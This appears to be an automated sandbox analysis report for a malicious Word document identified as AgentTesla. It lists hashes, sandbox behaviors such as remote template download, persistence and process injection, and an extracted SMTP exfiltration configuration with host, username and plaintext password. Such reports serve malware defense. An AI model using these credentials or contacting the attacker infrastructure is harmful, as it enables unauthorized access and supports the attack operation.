General
-
Target
aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f
-
Size
16KB
-
Sample
231207-b5n8csgfbj
-
MD5
b5b884c10723261ef25cc10db807eb8b
-
SHA1
5f89a7039838e52bb5e440d7b51b2635802dcc02
-
SHA256
aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f
-
SHA512
20ef9f8553e7cb2af0497c22b82084519dd7ad1ffb13100efc7900797aaa190ba1b3abb3e9a0ec6bad3eb8bd71bdb061f8d4c107565746948260e0967a4c9c7f
-
SSDEEP
384:uyXrVqFWus8PL8wi4OEwH8TIbE91r2fRGJYJvimP49eb:ucrOJ5P3DOqnYJQEvTP49G
Static task
static1
Behavioral task
behavioral1
Sample
aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f.docx
Resource
win7-20231130-en
Behavioral task
behavioral2
Sample
aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f.docx
Resource
win10v2004-20231127-en
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.turathmall-ksa.com - Port:
587 - Username:
[email protected] - Password:
Julliannah123 - Email To:
[email protected]
Targets
-
-
Target
aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f
-
Size
16KB
-
MD5
b5b884c10723261ef25cc10db807eb8b
-
SHA1
5f89a7039838e52bb5e440d7b51b2635802dcc02
-
SHA256
aeeab5a8e121ee1c3f075068d53a94b8b769fcb92376454f28bbfee12812514f
-
SHA512
20ef9f8553e7cb2af0497c22b82084519dd7ad1ffb13100efc7900797aaa190ba1b3abb3e9a0ec6bad3eb8bd71bdb061f8d4c107565746948260e0967a4c9c7f
-
SSDEEP
384:uyXrVqFWus8PL8wi4OEwH8TIbE91r2fRGJYJvimP49eb:ucrOJ5P3DOqnYJQEvTP49G
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Adds Run key to start application
-
Suspicious use of SetThreadContext
-